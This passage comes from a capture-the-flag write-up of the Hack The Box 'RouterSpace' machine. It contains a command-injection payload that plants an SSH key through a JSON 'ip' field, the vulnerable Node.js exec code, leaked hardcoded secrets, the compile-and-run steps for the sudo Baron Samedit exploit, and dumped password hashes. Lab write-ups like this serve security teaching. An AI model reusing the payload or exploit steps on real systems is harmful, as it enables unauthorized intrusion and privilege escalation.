{"ip":"0.0.0.0;echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQD8n5jjOE4i+yYLB4O9fBEclxopEOlKh45pBAGTOnc1H9A5O0n4pxcx9Ps/W3/oz6snuDIWlJuPfdBXKXU2rlf4XJ2aD7hpG2ZTWy7r+iQOaHnmNV4yGtNIA/ztFbQyUZjpDJxJZuxgA7WpH9shA9HUBlzQP6uk6BadMg4w5oDfA72063SAcgRpPQiv29YufFop7uY6jDDgkjnYPWfZW3mQ+GaWFyMPlK3g9nqYoPceOx2mb+1cBSl91eTkm04a/g7JaNYyzvN6KUPezKRcI37reOY5u6zGHsHIgzrFNsijk3BMptnOI/DNvxZ5cnYDMyVJC7CQyAKoBpTOU0YEBl4b kali@kali' &gt;&gt; ~/.ssh/authorized_keys"}
</code></pre></div></div>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-[~/…/HTB/B2R/RouterSpace/exploit]
└─<span class="nv">$ </span>ssh paul@routerspace.htb <span class="nt">-i</span> paul
The authenticity of host <span class="s1">'routerspace.htb (10.10.11.148)'</span> can<span class="s1">'t be established.
ED25519 key fingerprint is SHA256:iwHQgWKu/VDyjka2Y4j2V8P2Rk6K13HuNT4JTnITIDk.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '</span>routerspace.htb<span class="s1">' (ED25519) to the list of known hosts.
Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.4.0-90-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Sat 07 May 2022 07:34:49 PM UTC

  System load:           0.0
  Usage of /:            70.7% of 3.49GB
  Memory usage:          17%
  Swap usage:            0%
  Processes:             219
  Users logged in:       0
  IPv4 address for eth0: 10.10.11.148
  IPv6 address for eth0: dead:beef::250:56ff:feb9:4de8

 * Super-optimized for small spaces - read how we shrank the memory
   footprint of MicroK8s to make it the smallest full K8s around.

   https://ubuntu.com/blog/microk8s-memory-optimisation

80 updates can be applied immediately.
31 of these updates are standard security updates.
To see these additional updates run: apt list --upgradable

The list of available updates is more than a week old.
To check for new updates run: sudo apt update

Last login: Sat Nov 20 18:30:35 2021 from 192.168.150.133
paul@routerspace:~$ id; hostname; ip a; cat ~/user.txt
uid=1001(paul) gid=1001(paul) groups=1001(paul)
routerspace.htb
1: lo: &lt;LOOPBACK,UP,LOWER_UP&gt; mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host
       valid_lft forever preferred_lft forever
2: eth0: &lt;BROADCAST,MULTICAST,UP,LOWER_UP&gt; mtu 1500 qdisc mq state UP group default qlen 1000
    link/ether 00:50:56:b9:4d:e8 brd ff:ff:ff:ff:ff:ff
    inet 10.10.11.148/23 brd 10.10.11.255 scope global eth0
       valid_lft forever preferred_lft forever
    inet6 dead:beef::250:56ff:feb9:4de8/64 scope global dynamic mngtmpaddr
       valid_lft 86396sec preferred_lft 14396sec
    inet6 fe80::250:56ff:feb9:4de8/64 scope link
       valid_lft forever preferred_lft forever
18f213ac5d7fbc0935d14062481cf7cf
</span></code></pre></div></div>

<h3 id="vulnerable-code">Vulnerable Code</h3>

<p><strong>index.js</strong></p>

<div class="language-json highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="err">...</span><span class="w">
</span><span class="err">app.post(</span><span class="w">                                                                                                                                                                                                                                   
  </span><span class="s2">"/api/v4/monitoring/router/dev/check/deviceAccess"</span><span class="err">,</span><span class="w">                                                                                                                                                                                       
  </span><span class="err">checkAgent,</span><span class="w">                                                                                                                                                                                                                               
  </span><span class="err">async</span><span class="w"> </span><span class="err">function</span><span class="w"> </span><span class="err">(req,</span><span class="w"> </span><span class="err">res)</span><span class="w"> </span><span class="p">{</span><span class="w">                                                                                                                                                                                                               
    </span><span class="err">var</span><span class="w"> </span><span class="err">options</span><span class="w"> </span><span class="err">=</span><span class="w"> </span><span class="p">{</span><span class="w">                                                                                                                                                                                                                         
      </span><span class="err">encoding:</span><span class="w"> </span><span class="s2">"utf8"</span><span class="p">,</span><span class="w">                                                                                                                                                                                                                     
    </span><span class="p">}</span><span class="err">;</span><span class="w">                                                                                                                                                                                                                                      
    </span><span class="err">var</span><span class="w"> </span><span class="err">ip</span><span class="w"> </span><span class="err">=</span><span class="w"> </span><span class="err">req.body</span><span class="p">[</span><span class="s2">"ip"</span><span class="p">]</span><span class="err">;</span><span class="w">                                                                                                                                                                                                                
    </span><span class="err">const</span><span class="w"> </span><span class="err">exec</span><span class="w"> </span><span class="err">=</span><span class="w"> </span><span class="err">promisify(require('child_process').exec);</span><span class="w">                                                                                                                                                                                  
    </span><span class="err">exec(</span><span class="s2">"echo "</span><span class="w"> </span><span class="err">+</span><span class="w"> </span><span class="err">ip</span><span class="p">,</span><span class="w"> </span><span class="err">options).then((</span><span class="p">{</span><span class="w"> </span><span class="err">stdout</span><span class="w"> </span><span class="p">}</span><span class="err">)</span><span class="w"> </span><span class="err">=&gt;</span><span class="w"> </span><span class="err">res.json(stdout).send()).catch(res.json);</span><span class="w">                                                                                                                                              
  </span><span class="p">}</span><span class="w">                                                                                                                                                                                                                                         
</span><span class="err">);</span><span class="w">
</span><span class="err">...</span><span class="w">
</span></code></pre></div></div>

<h1 id="privilege-escalation">Privilege Escalation</h1>

<h2 id="local-enumeration">Local enumeration</h2>

<p>Enumerated passwd:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>paul@routerspace:~<span class="nv">$ </span><span class="nb">cat</span> /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
<span class="nb">sync</span>:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System <span class="o">(</span>admin<span class="o">)</span>:/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
usbmux:x:111:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
sshd:x:112:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
paul:x:1001:1001:,,,:/home/paul:/bin/bash
</code></pre></div></div>

<p>Enumerated hardcoded credentials:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>paul@routerspace:/opt/www/public/routerspace<span class="nv">$ </span><span class="nb">cat </span>index.js
var express <span class="o">=</span> require<span class="o">(</span><span class="s2">"express"</span><span class="o">)</span><span class="p">;</span>
const path <span class="o">=</span> require<span class="o">(</span><span class="s2">"path"</span><span class="o">)</span><span class="p">;</span>
const app <span class="o">=</span> express<span class="o">()</span><span class="p">;</span>
const <span class="o">{</span> check, oneOf, validationResult <span class="o">}</span> <span class="o">=</span> require<span class="o">(</span><span class="s2">"express-validator"</span><span class="o">)</span><span class="p">;</span>
const promisify <span class="o">=</span> require<span class="o">(</span><span class="s1">'util'</span><span class="o">)</span>.promisify<span class="p">;</span>

const port <span class="o">=</span> 80<span class="p">;</span>
const tokenSecret <span class="o">=</span> <span class="s2">"v%XsfkyZ#2SsfY9F--ippsec.rocks--x0o^VvYSRCw</span><span class="nv">$5</span><span class="s2">#MKi5"</span><span class="p">;</span>
const userAgent <span class="o">=</span> <span class="s2">"RouterSpaceAgent"</span><span class="p">;</span>
const payload <span class="o">=</span> <span class="o">[</span>
  <span class="s2">"paul@routerspace.htb"</span>,
  <span class="s2">"*******************"</span>,
  <span class="s2">"Hyakutake-0x1"</span>,
<span class="o">]</span><span class="p">;</span>
...
app.post<span class="o">(</span>                                                                                                                                                                                                                                   
  <span class="s2">"/api/v4/monitoring/router/dev/check/deviceAccess"</span>,                                                                                                                                                                                       
  checkAgent,                                                                                                                                                                                                                               
  async <span class="k">function</span> <span class="o">(</span>req, res<span class="o">)</span> <span class="o">{</span>                                                                                                                                                                                                               
    var options <span class="o">=</span> <span class="o">{</span>                                                                                                                                                                                                                         
      encoding: <span class="s2">"utf8"</span>,                                                                                                                                                                                                                     
    <span class="o">}</span><span class="p">;</span>                                                                                                                                                                                                                                      
    var ip <span class="o">=</span> req.body[<span class="s2">"ip"</span><span class="o">]</span><span class="p">;</span>                                                                                                                                                                                                                
    const <span class="nb">exec</span> <span class="o">=</span> promisify<span class="o">(</span>require<span class="o">(</span><span class="s1">'child_process'</span><span class="o">)</span>.exec<span class="o">)</span><span class="p">;</span>                                                                                                                                                                                  
    <span class="nb">exec</span><span class="o">(</span><span class="s2">"echo "</span> + ip, options<span class="o">)</span>.then<span class="o">(({</span> stdout <span class="o">})</span> <span class="o">=&gt;</span> res.json<span class="o">(</span>stdout<span class="o">)</span>.send<span class="o">())</span>.catch<span class="o">(</span>res.json<span class="o">)</span><span class="p">;</span>                                                                                                                                              
  <span class="o">}</span>                                                                                                                                                                                                                                         
<span class="o">)</span><span class="p">;</span>
</code></pre></div></div>

<p>Enumerated possible exploit</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>═══════════╣ Executing Linux Exploit Suggester
╚ https://github.com/mzet-/linux-exploit-suggester
<span class="o">[</span>+] <span class="o">[</span>CVE-2021-4034] PwnKit

   Details: https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt
   Exposure: probable
   Tags: <span class="o">[</span> <span class="nv">ubuntu</span><span class="o">=</span>10|11|12|13|14|15|16|17|18|19|20|21 <span class="o">]</span>,debian<span class="o">=</span>7|8|9|10|11,fedora,manjaro
   Download URL: https://codeload.github.com/berdav/CVE-2021-4034/zip/main

<span class="o">[</span>+] <span class="o">[</span>CVE-2021-3156] <span class="nb">sudo </span>Baron Samedit

   Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
   Exposure: probable
   Tags: <span class="nv">mint</span><span class="o">=</span>19,[ <span class="nv">ubuntu</span><span class="o">=</span>18|20 <span class="o">]</span>, <span class="nv">debian</span><span class="o">=</span>10
   Download URL: https://codeload.github.com/blasty/CVE-2021-3156/zip/main

<span class="o">[</span>+] <span class="o">[</span>CVE-2021-3156] <span class="nb">sudo </span>Baron Samedit 2

   Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
   Exposure: probable
   Tags: <span class="nv">centos</span><span class="o">=</span>6|7|8,[ <span class="nv">ubuntu</span><span class="o">=</span>14|16|17|18|19|20 <span class="o">]</span>, <span class="nv">debian</span><span class="o">=</span>9|10
   Download URL: https://codeload.github.com/worawit/CVE-2021-3156/zip/main

<span class="o">[</span>+] <span class="o">[</span>CVE-2021-22555] Netfilter heap out-of-bounds write

   Details: https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html
   Exposure: probable
   Tags: <span class="o">[</span> <span class="nv">ubuntu</span><span class="o">=</span>20.04 <span class="o">]{</span>kernel:5.8.0-<span class="k">*</span><span class="o">}</span>
   Download URL: https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c
   ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2021-22555/exploit.c
   Comments: ip_tables kernel module must be loaded

<span class="o">[</span>+] <span class="o">[</span>CVE-2017-5618] setuid screen v4.5.0 LPE

   Details: https://seclists.org/oss-sec/2017/q1/184
   Exposure: less probable
   Download URL: https://www.exploit-db.com/download/https://www.exploit-db.com/exploits/41154
</code></pre></div></div>

<h2 id="cve-2021-3156-heap-based-buffer-overflow-in-sudo-baron-samedit">CVE-2021-3156: Heap-Based Buffer Overflow in Sudo (Baron Samedit)</h2>

<p><a href="https://github.com/CptGibbon/CVE-2021-3156">https://github.com/CptGibbon/CVE-2021-3156</a></p>

<p>Enumerated the target for the correct versions:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>paul@routerspace:~<span class="nv">$ </span><span class="nb">sudo</span> <span class="nt">-V</span>
Sudo version 1.8.31

OS: Linux version 5.4.0-90-generic <span class="o">(</span>buildd@lgw01-amd64-054<span class="o">)</span> <span class="o">(</span>gcc version 9.3.0 <span class="o">(</span>Ubuntu 9.3.0-17ubuntu1~20.04<span class="o">))</span> <span class="c">#101-Ubuntu SMP Fri Oct 15 20:00:55 UTC 2021</span>
User &amp; Groups: <span class="nv">uid</span><span class="o">=</span>1001<span class="o">(</span>paul<span class="o">)</span> <span class="nv">gid</span><span class="o">=</span>1001<span class="o">(</span>paul<span class="o">)</span> <span class="nb">groups</span><span class="o">=</span>1001<span class="o">(</span>paul<span class="o">)</span>
Hostname: routerspace.htb
Writable folder: /dev/shm
<span class="o">[</span>+] /usr/bin/ping is available <span class="k">for </span>network discovery <span class="o">(</span>linpeas can discover hosts, learn more with <span class="nt">-h</span><span class="o">)</span>
<span class="o">[</span>+] /usr/bin/nc is available <span class="k">for </span>network discover &amp; port scanning <span class="o">(</span>linpeas can discover hosts and scan ports, learn more with <span class="nt">-h</span><span class="o">)</span>
</code></pre></div></div>

<p>Copied the entire PoC folder on the machine:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-[~/…/HTB/B2R/RouterSpace/exploit]
└─<span class="nv">$ </span>scp <span class="nt">-r</span> <span class="nt">-i</span> paul CVE-2021-3156 paul@routerspace.htb:/home/paul/CVE
shellcode.c                                                                                                                                                                                               100%  599    12.9KB/s   00:00
x.so.2                                                                                                                                                                                                    100%   13KB 178.4KB/s   00:00
HEAD                                                                                                                                                                                                      100%   21     0.6KB/s   00:00
HEAD                                                                                                                                                                                                      100%  178     3.3KB/s   00:00
main                                                                                                                                                                                                      100%  178     4.8KB/s   00:00
HEAD                                                                                                                                                                                                      100%  178     4.5KB/s   00:00
index                                                                                                                                                                                                     100%  441    11.5KB/s   00:00
packed-refs                                                                                                                                                                                               100%  112     3.1KB/s   00:00
main                                                                                                                                                                                                      100%   41     1.0KB/s   00:00
HEAD                                                                                                                                                                                                      100%   30     0.8KB/s   00:00
config                                                                                                                                                                                                    100%  263     6.6KB/s   00:00
exclude                                                                                                                                                                                                   100%  240     6.3KB/s   00:00
update.sample                                                                                                                                                                                             100% 3650    91.9KB/s   00:00
pre-merge-commit.sample                                                                                                                                                                                   100%  416    11.3KB/s   00:00
pre-receive.sample                                                                                                                                                                                        100%  544    14.7KB/s   00:00
pre-rebase.sample                                                                                                                                                                                         100% 4898   123.3KB/s   00:00
post-update.sample                                                                                                                                                                                        100%  189     4.8KB/s   00:00
push-to-checkout.sample                                                                                                                                                                                   100% 2783    49.3KB/s   00:00
commit-msg.sample                                                                                                                                                                                         100%  896    24.2KB/s   00:00
pre-push.sample                                                                                                                                                                                           100% 1374    37.0KB/s   00:00
fsmonitor-watchman.sample                                                                                                                                                                                 100% 4655   119.4KB/s   00:00
applypatch-msg.sample                                                                                                                                                                                     100%  478    12.9KB/s   00:00
pre-applypatch.sample                                                                                                                                                                                     100%  424    11.3KB/s   00:00
pre-commit.sample                                                                                                                                                                                         100% 1643    44.2KB/s   00:00
prepare-commit-msg.sample                                                                                                                                                                                 100% 1492    39.5KB/s   00:00
pack-03e9e7d8779c604437eed1ee00f55f70de330ba7.idx                                                                                                                                                         100% 1436    35.5KB/s   00:00
pack-03e9e7d8779c604437eed1ee00f55f70de330ba7.pack                                                                                                                                                        100% 4227   100.9KB/s   00:00
description                                                                                                                                                                                               100%   73     1.7KB/s   00:00
Dockerfile                                                                                                                                                                                                100%  332     8.8KB/s   00:00
exploit.c                                                                                                                                                                                                 100% 2048    54.2KB/s   00:00
README.md                                                                                                                                                                                                 100%  692    18.5KB/s   00:00
Makefile                                                                                                                                                                                                  100%  208     5.6KB/s   00:00
exploit                                                                                                                                                                                                   100%   16KB 364.7KB/s   00:00
</code></pre></div></div>

<p>Compiled the exploit and obtained the flag:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>paul@routerspace:~/CVE<span class="nv">$ </span>make
<span class="nb">mkdir </span>libnss_x
cc <span class="nt">-O3</span> <span class="nt">-shared</span> <span class="nt">-nostdlib</span> <span class="nt">-o</span> libnss_x/x.so.2 shellcode.c
cc <span class="nt">-O3</span> <span class="nt">-o</span> exploit exploit.c
paul@routerspace:~/CVE<span class="nv">$ </span>./exploit
<span class="c"># id; hostname; ip a; cat /root/root.txt</span>
<span class="nv">uid</span><span class="o">=</span>0<span class="o">(</span>root<span class="o">)</span> <span class="nv">gid</span><span class="o">=</span>0<span class="o">(</span>root<span class="o">)</span> <span class="nb">groups</span><span class="o">=</span>0<span class="o">(</span>root<span class="o">)</span>,1001<span class="o">(</span>paul<span class="o">)</span>
routerspace.htb
1: lo: &lt;LOOPBACK,UP,LOWER_UP&gt; mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    <span class="nb">link</span>/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host
       valid_lft forever preferred_lft forever
2: eth0: &lt;BROADCAST,MULTICAST,UP,LOWER_UP&gt; mtu 1500 qdisc mq state UP group default qlen 1000
    <span class="nb">link</span>/ether 00:50:56:b9:4d:e8 brd ff:ff:ff:ff:ff:ff
    inet 10.10.11.148/23 brd 10.10.11.255 scope global eth0
       valid_lft forever preferred_lft forever
    inet6 dead:beef::250:56ff:feb9:4de8/64 scope global dynamic mngtmpaddr
       valid_lft 86394sec preferred_lft 14394sec
    inet6 fe80::250:56ff:feb9:4de8/64 scope <span class="nb">link
       </span>valid_lft forever preferred_lft forever
83567d243b7de6ad84e6b2a4543a24ee
</code></pre></div></div>

<p><img src="/assets/images/Screenshots/RouterSpace/Untitled%203.png" alt="Untitled" /></p>

<h1 id="trophy">Trophy</h1>

<p><img src="/assets/images/Screenshots/RouterSpace/Untitled%204.png" alt="Untitled" /></p>

<p><strong>User.txt</strong></p>

<p>18f213ac5d7fbc0935d14062481cf7cf</p>

<p><strong>Root.txt</strong></p>

<p>83567d243b7de6ad84e6b2a4543a24ee</p>

<p><strong>/etc/shadow</strong></p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># cat /etc/shadow | grep '\$'</span>
root:<span class="nv">$6$lw6PWI9kEABNZiKm$UoysFK0xDZgFk828w</span>.7t30d8iRi6Qxv9xTkwvjJPRRxJvFQwTOkjvUq5y4OUO/LYV8KlqORQ4kolNeDfGFQd5.:18956:0:99999:7:::
paul:<span class="nv">$6$XYKUEvTt794C63vT$Y7MYBAH81SB</span>.kZujevBehnueBAwIX3PeYPwilZ1L1DDhFFaGxac8p8N2411NWl7.dPSb6nLYor8Jf1oyM5wSf1:19044:0:99999:7:::
</code></pre></div></div>

<style>
.share {
  display: block;
  margin-left: auto;
  margin-right: auto;
  text-align: center;
}
</style>

<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" display="none" version="1.1"><defs>
    <symbol id="icon-menu" viewBox="0 0 1024 1024"><path class="path1" d="M128 213.333h768q17.667 0 30.167 12.5t12.5 30.167-12.5 30.167-30.167 12.5h-768q-17.667 0-30.167-12.5t-12.5-30.167 12.5-30.167 30.167-12.5zM128 725.333h768q17.667 0 30.167 12.5t12.5 30.167-12.5 30.167-30.167 12.5h-768q-17.667 0-30.167-12.5t-12.5-30.167 12.5-30.167 30.167-12.5zM128 469.333h768q17.667 0 30.167 12.5t12.5 30.167-12.5 30.167-30.167 12.5h-768q-17.667 0-30.167-12.5t-12.5-30.167 12.5-30.167 30.167-12.5z" /></symbol>
    <symbol id="icon-search" viewBox="0 0 951 1024"><path class="path1" d="M658.286 475.429q0-105.714-75.143-180.857t-180.857-75.143-180.857 75.143-75.143 180.857 75.143 180.857 180.857 75.143 180.857-75.143 75.143-180.857zM950.857 950.857q0 29.714-21.714 51.429t-51.429 21.714q-30.857 0-51.429-21.714l-196-195.429q-102.286 70.857-228 70.857-81.714 0-156.286-31.714t-128.571-85.714-85.714-128.571-31.714-156.286 31.714-156.286 85.714-128.571 128.571-85.714 156.286-31.714 156.286 31.714 128.571 85.714 85.714 128.571 31.714 156.286q0 125.714-70.857 228l196 196q21.143 21.143 21.143 51.429z" /></symbol>
    <symbol id="icon-email" viewBox="0 0 1024 1024"><path class="path1" d="M950.857 859.429v-438.857q-18.286 20.571-39.429 37.714-153.143 117.714-243.429 193.143-29.143 24.571-47.429 38.286t-49.429 27.714-58.571 14h-1.143q-27.429 0-58.571-14t-49.429-27.714-47.429-38.286q-90.286-75.429-243.429-193.143-21.143-17.143-39.429-37.714v438.857q0 7.429 5.429 12.857t12.857 5.429h841.143q7.429 0 12.857-5.429t5.429-12.857zM950.857 258.857v-14t-0.286-7.429-1.714-7.143-3.143-5.143-5.143-4.286-8-1.429h-841.143q-7.429 0-12.857 5.429t-5.429 12.857q0 96 84 162.286 110.286 86.857 229.143 181.143 3.429 2.857 20 16.857t26.286 21.429 25.429 18 28.857 15.714 24.571 5.143h1.143q11.429 0 24.571-5.143t28.857-15.714 25.429-18 26.286-21.429 20-16.857q118.857-94.286 229.143-181.143 30.857-24.571 57.429-66t26.571-75.143zM1024 237.714v621.714q0 37.714-26.857 64.571t-64.571 26.857h-841.143q-37.714 0-64.571-26.857t-26.857-64.571v-621.714q0-37.714 26.857-64.571t64.571-26.857h841.143q37.714 0 64.571 26.857t26.857 64.571z" /></symbol>
    <symbol id="icon-close" viewBox="0 0 805 1024"><path class="path1" d="M741.714 755.429q0 22.857-16 38.857l-77.714 77.714q-16 16-38.857 16t-38.857-16l-168-168-168 168q-16 16-38.857 16t-38.857-16l-77.714-77.714q-16-16-16-38.857t16-38.857l168-168-168-168q-16-16-16-38.857t16-38.857l77.714-77.714q16-16 38.857-16t38.857 16l168 168 168-168q16-16 38.857-16t38.857 16l77.714 77.714q16 16 16 38.857t-16 38.857l-168 168 168 168q16 16 16 38.857z" /></symbol>
    <symbol id="icon-twitter" viewBox="0 0 951 1024"><path class="path1" d="M925.714 233.143q-38.286 56-92.571 95.429 0.571 8 0.571 24 0 74.286-21.714 148.286t-66 142-105.429 120.286-147.429 83.429-184.571 31.143q-154.857 0-283.429-82.857 20 2.286 44.571 2.286 128.571 0 229.143-78.857-60-1.143-107.429-36.857t-65.143-91.143q18.857 2.857 34.857 2.857 24.571 0 48.571-6.286-64-13.143-106-63.714t-42-117.429v-2.286q38.857 21.714 83.429 23.429-37.714-25.143-60-65.714t-22.286-88q0-50.286 25.143-93.143 69.143 85.143 168.286 136.286t212.286 56.857q-4.571-21.714-4.571-42.286 0-76.571 54-130.571t130.571-54q80 0 134.857 58.286 62.286-12 117.143-44.571-21.143 65.714-81.143 101.714 53.143-5.714 106.286-28.571z" /></symbol>
    <symbol id="icon-facebook" viewBox="0 0 585 1024"><path class="path1" d="M548 6.857v150.857h-89.714q-49.143 0-66.286 20.571t-17.143 61.714v108h167.429l-22.286 169.143h-145.143v433.714h-174.857v-433.714h-145.714v-169.143h145.714v-124.571q0-106.286 59.429-164.857t158.286-58.571q84 0 130.286 6.857z" /></symbol>
    <symbol id="icon-rss" viewBox="0 0 805 1024"><path class="path1" d="M219.429 768q0 45.714-32 77.714t-77.714 32-77.714-32-32-77.714 32-77.714 77.714-32 77.714 32 32 77.714zM512 838.286q1.143 16-9.714 27.429-10.286 12-26.857 12h-77.143q-14.286 0-24.571-9.429t-11.429-23.714q-12.571-130.857-105.429-223.714t-223.714-105.429q-14.286-1.143-23.714-11.429t-9.429-24.571v-77.143q0-16.571 12-26.857 9.714-9.714 24.571-9.714h2.857q91.429 7.429 174.857 46t148 103.714q65.143 64.571 103.714 148t46 174.857zM804.571 839.429q1.143 15.429-10.286 26.857-10.286 11.429-26.286 11.429h-81.714q-14.857 0-25.429-10t-11.143-24.286q-6.857-122.857-57.714-233.429t-132.286-192-192-132.286-233.429-58.286q-14.286-0.571-24.286-11.143t-10-24.857v-81.714q0-16 11.429-26.286 10.286-10.286 25.143-10.286h1.714q149.714 7.429 286.571 68.571t243.143 168q106.857 106.286 168 243.143t68.571 286.571z" /></symbol>
    <symbol id="icon-google-plus" viewBox="0 0 951 1024"><path class="path1" d="M420 454.857q0 20.571 18.286 40.286t44.286 38.857 51.714 42 44 59.429 18.286 81.143q0 51.429-27.429 98.857-41.143 69.714-120.571 102.571t-170.286 32.857q-75.429 0-140.857-23.714t-98-78.571q-21.143-34.286-21.143-74.857 0-46.286 25.429-85.714t67.714-65.714q74.857-46.857 230.857-57.143-18.286-24-27.143-42.286t-8.857-41.714q0-20.571 12-48.571-26.286 2.286-38.857 2.286-84.571 0-142.571-55.143t-58-139.714q0-46.857 20.571-90.857t56.571-74.857q44-37.714 104.286-56t124.286-18.286h238.857l-78.857 50.286h-74.857q42.286 36 64 76t21.714 91.429q0 41.143-14 74t-33.714 53.143-39.714 37.143-34 35.143-14 37.714zM336.571 400q21.714 0 44.571-9.429t37.714-24.857q30.286-32.571 30.286-90.857 0-33.143-9.714-71.429t-27.714-74-48.286-59.143-66.857-23.429q-24 0-47.143 11.143t-37.429 30q-26.857 33.714-26.857 91.429 0 26.286 5.714 55.714t18 58.857 29.714 52.857 42.857 38.286 55.143 14.857zM337.714 898.857q33.143 0 63.714-7.429t56.571-22.286 41.714-41.714 15.714-62.286q0-14.286-4-28t-8.286-24-15.429-23.714-16.857-20-22-19.714-20.857-16.571-23.714-17.143-20.857-14.857q-9.143-1.143-27.429-1.143-30.286 0-60 4t-61.429 14.286-55.429 26.286-39.143 42.571-15.429 60.286q0 40 20 70.571t52.286 47.429 68 25.143 72.857 8.286zM800.571 398.286h121.714v61.714h-121.714v125.143h-60v-125.143h-121.143v-61.714h121.143v-124h60v124z" /></symbol>
    <symbol id="icon-github-alt" viewBox="0 0 951 1024"><path class="path1" d="M365.714 694.857q0 22.857-7.143 46.857t-24.571 43.429-41.429 19.429-41.429-19.429-24.571-43.429-7.143-46.857 7.143-46.857 24.571-43.429 41.429-19.429 41.429 19.429 24.571 43.429 7.143 46.857zM731.429 694.857q0 22.857-7.143 46.857t-24.571 43.429-41.429 19.429-41.429-19.429-24.571-43.429-7.143-46.857 7.143-46.857 24.571-43.429 41.429-19.429 41.429 19.429 24.571 43.429 7.143 46.857zM822.857 694.857q0-68.571-39.429-116.571t-106.857-48q-23.429 0-111.429 12-40.571 6.286-89.714 6.286t-89.714-6.286q-86.857-12-111.429-12-67.429 0-106.857 48t-39.429 116.571q0 50.286 18.286 87.714t46.286 58.857 69.714 34.286 80 16.857 85.143 4h96q46.857 0 85.143-4t80-16.857 69.714-34.286 46.286-58.857 18.286-87.714zM950.857 594.286q0 118.286-34.857 189.143-21.714 44-60.286 76t-80.571 49.143-97.143 27.143-98 12.571-95.429 2.571q-44.571 0-81.143-1.714t-84.286-7.143-87.143-17.143-78.286-29.429-69.143-46.286-49.143-65.714q-35.429-70.286-35.429-189.143 0-135.429 77.714-226.286-15.429-46.857-15.429-97.143 0-66.286 29.143-124.571 61.714 0 108.571 22.571t108 70.571q84-20 176.571-20 84.571 0 160 18.286 60-46.857 106.857-69.143t108-22.286q29.143 58.286 29.143 124.571 0 49.714-15.429 96 77.714 91.429 77.714 227.429z" /></symbol>
    <symbol id="icon-right-arrow"><path d="M21.205,5.007c-0.429-0.444-1.143-0.444-1.587,0c-0.429,0.429-0.429,1.143,0,1.571l8.047,8.047H1.111  C0.492,14.626,0,15.118,0,15.737c0,0.619,0.492,1.127,1.111,1.127h26.554l-8.047,8.032c-0.429,0.444-0.429,1.159,0,1.587  c0.444,0.444,1.159,0.444,1.587,0l9.952-9.952c0.444-0.429,0.444-1.143,0-1.571L21.205,5.007z" fill="#efb102" /></symbol>
